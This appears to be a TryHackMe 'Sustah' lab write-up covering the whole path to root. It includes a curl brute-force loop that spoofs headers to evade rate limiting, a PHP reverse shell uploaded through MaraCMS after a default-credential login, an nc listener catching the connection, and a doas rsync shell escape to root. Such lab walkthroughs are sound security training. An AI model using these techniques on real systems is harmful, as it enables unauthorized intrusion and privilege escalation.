THM: Sustah
Play a game to gain access to a vulnerable CMS. Can you beat the odds?
This is Sustah from THM. It’s medium rated. We have another ‘hint’:
The developers have added anti-cheat measures to their game. Are you able to defeat the restrictions to gain access to their internal CMS?
SSH and HTTP, plus another HTTP port (8085).
Port 80
The front page is a picture, with a quote:
“What you are is what you have been. What you’ll be is what you do now.” Buddha
Cool, cool. Dirsearch draws a blank. Doesn’t sound like a game though; let’s try the other port.
Port 8085
Here’s the game. We find a ‘spinner’ wheel (like roulette), which we can ‘spin’. There is also a message:
Feeling lucky? Guess the right number. You have a 0.004% chance of winning.
We can enter a number, and press a button to submit it. Capturing the request shows the number is submitted as a POST request to /home. 0.004% corresponds to 1 in 25000, so it’s just brute force the request with 25000 numbers, right?
Well yes, but it’s not quite that simple.
When we send a request, the server sends back a response like this:
HTTP/1.1 200 OK
Server: gunicorn/20.0.4
Date: Tue, 26 Jan 2021 09:45:51 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1004
X-RateLimit-Limit: 10
X-RateLimit-Remaining: 9
X-RateLimit-Reset: 1611654412
Retry-After: 60
Sending more than 10 requests quickly results in a 429 - Too many requests error.
I hadn’t seen this before, but some research revealed we can set some headers of our own to try to bypass this. In the end what I did was write a script to use cURL to brute force the server, with the additional headers and also setting the user agent to the number I was sending as well; just so it wasn’t always the same. I got the script to diff the server response for each value against a prototypical bad response until I got something different:
for i in {10000..25000}
touch $i.out
curl --silent 'http://sustah:8085/home' -H 'User-Agent: $i' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://sustah:8085' -H 'Connection: keep-alive' -H 'Referer: http://sustah:8085/home' -H 'Upgrade-Insecure-Requests: 1' -H 'X-Forwarded-For: ' -H 'X-Forwarded-For:' -H 'X-Remote-IP:' -H 'X-Remote-Addr:' -H 'X-Originating-IP:' --data-raw "number=$i" >> $i.out
diff $i.out proto.out
if [[ $status != 0 ]]
echo "inspect $i"
rm $i.out
This script, after some time, revealed the answer: /YouGotTh3P@th
The Path
The path doesn’t go with port 8085, it goes on Port 80. And here, we find something called MaraCMS, which is a (sorry) butt-ugly CMS written in PHP. You can login with default credentials (which then have to be changed); this gets you an admin account. After that I just clicked around until I found a way to upload a shell, it wasn’t difficult but then later I Googled and found instructions. Bingo. I used the Pentestmonkey PHP reverse shell.
root@kali:/opt/tryhackme/sustah# nc -nvlp 1234
listening on [any] 1234 ...
connect to [] from (UNKNOWN) [] 39808
Linux ubuntu-xenial 4.4.0-197-generic #229-Ubuntu SMP Wed Nov 25 11:05:42 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
09:25:00 up 1:00, 0 users, load average: 0.00, 0.00, 0.00
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: cant access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
We have one main user; kiran. Enumerate the server to find his password:
www-data@ubuntu-xenial:/var$ cd backups
cd backups
www-data@ubuntu-xenial:/var/backups$ ls -lash
ls -lash
total 636K
4.0K drwxr-xr-x 2 root root 4.0K Dec 9 10:04 .
4.0K drwxr-xr-x 14 root root 4.0K Dec 6 06:00 ..
4.0K -r--r--r-- 1 root root 1.7K Dec 6 13:19 .bak.passwd
52K -rw-r--r-- 1 root root 50K Dec 6 06:25 alternatives.tar.0
8.0K -rw-r--r-- 1 root root 6.2K Dec 9 06:46 apt.extended_states.0
4.0K -rw-r--r-- 1 root root 715 Dec 6 17:08 apt.extended_states.1.gz
4.0K -rw-r--r-- 1 root root 509 Nov 12 19:53 dpkg.diversions.0
4.0K -rw-r--r-- 1 root root 207 Dec 6 06:01 dpkg.statoverride.0
536K -rw-r--r-- 1 root root 535K Dec 6 06:19 dpkg.status.0
4.0K -rw------- 1 root root 849 Dec 6 06:17 group.bak
4.0K -rw------- 1 root shadow 714 Dec 6 06:17 gshadow.bak
4.0K -rw------- 1 root root 1.7K Dec 6 13:19 passwd.bak
4.0K -rw------- 1 root shadow 1.1K Dec 6 06:17 shadow.bak
www-data@ubuntu-xenial:/var/backups$ cat .bak.passwd
cat .bak.passwd
# etc etc
kiran:x:1002:1002:A PASSWORD HERE:/home/kiran:
www-data@ubuntu-xenial:/var/backups$ su kiran
su kiran
Password: REDACTED
kiran@ubuntu-xenial:/var/backups$ sudo -l
sudo -l
[sudo] password for kiran: trythispasswordforuserkiran
Sorry, user kiran may not run sudo on ubuntu-xenial.
No sudo, but something similar….
Linpeas shows me something I’ve never seen before:
[+] Checking doas.conf
permit nopass kiran as root cmd rsync
Sorry, what?
The doas utility is a program originally written for OpenBSD which allows a user to run a command as though they were another user. Typically doas is used to allow non-privleged users to run commands as though they were the root user. The doas program acts as an alternative to sudo, which is a popular method in the Linux community for granting admin access to specific users.
Right, so it’s basically sudo. So, with that and GTFOBins, we should be good?
kiran@ubuntu-xenial:/var/backups$ /usr/local/bin/doas -u root rsync -e 'sh -c "sh 0<&2 1>&2"'
< -u root rsync -e 'sh -c "sh 0<&2 1>&2"'
# cd /root
cd /root
# ls -lash
ls -lash
total 32K
4.0K drwx------ 4 root root 4.0K Dec 9 06:51 .
4.0K drwxr-xr-x 25 root root 4.0K Jan 26 08:24 ..
4.0K -rw-rw-r-- 1 root root 30 Dec 9 06:51 .bash_profile
4.0K -rw-r--r-- 1 root root 3.1K Dec 9 05:26 .bashrc
4.0K drwx------ 3 root root 4.0K Dec 7 10:37 .cache
4.0K drwxrwxr-x 2 root root 4.0K Dec 7 09:17 .nano
4.0K -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
4.0K -r-------- 1 root root 33 Dec 9 11:09 root.txt
# cat root.txt
cat root.txt
# id;hostname
uid=0(root) gid=0(root) groups=0(root)
Done and done!